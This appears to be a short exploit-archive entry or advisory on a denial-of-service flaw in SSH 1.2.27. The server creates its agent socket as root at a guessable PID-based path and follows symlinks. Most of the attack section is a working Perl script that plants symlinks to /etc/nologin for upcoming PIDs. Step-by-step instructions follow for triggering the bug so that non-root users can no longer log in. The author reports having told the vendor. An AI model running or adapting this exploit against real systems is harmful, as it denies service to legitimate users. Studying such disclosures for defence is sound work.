SSH has the option of setting up "authentication sockets", used to pass authentication keys securely. When this is used, a socket is created on both client and server machines; the socket created on the server uses an often easy to guess filename (based on the PID)...
75491b9d176b71151fc9e9366f1486cb0fe9a8525c93ee0c5a2c52acb43f9ff4
- SSH 1.2.27 DOS:
o SSH has the option of setting up "authentication sockets", used to
pass authentication keys securely. When this is used, a socket is
created on both client and server machines; the socket created on the
server uses an often easy to guess filename (based on the PID)...
The creation of this socket is done while the server is acting as
root and does follow symlinks.
exploit:
- connect to remote machine
- run following script (creates symlinks for the next 50 PID's):
#!/usr/bin/perl
$pid = $$;
$whoami = `whoami`;
chop($whoami);
mkdir("/tmp/ssh-$whoami", 0700);
for ($i = $pid; $i < $pid+50; $i++) {
symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
}
- on local machine, execute ssh-agent1; it will produce a few lines
to cut and paste into your shell. Do so.
- ssh1 to the remote machine; enter password
The socket will have been created at /etc/nologin, preventing other
non-root users from logging in. This connection too will die with
"Logins are currently denied by /etc/nologin:"
This was tested on a RedHat 6.0 machine, with standard
configure/make/install installation of ssh. This script should work
pretty well for systems that create processes where each PID is one
greater than the last; other platforms may require modifications, or
many many more links, if they're exploitable.
I sent this info in to the ssh folks a while ago and they were looking
into it; haven't heard from them in over a week though.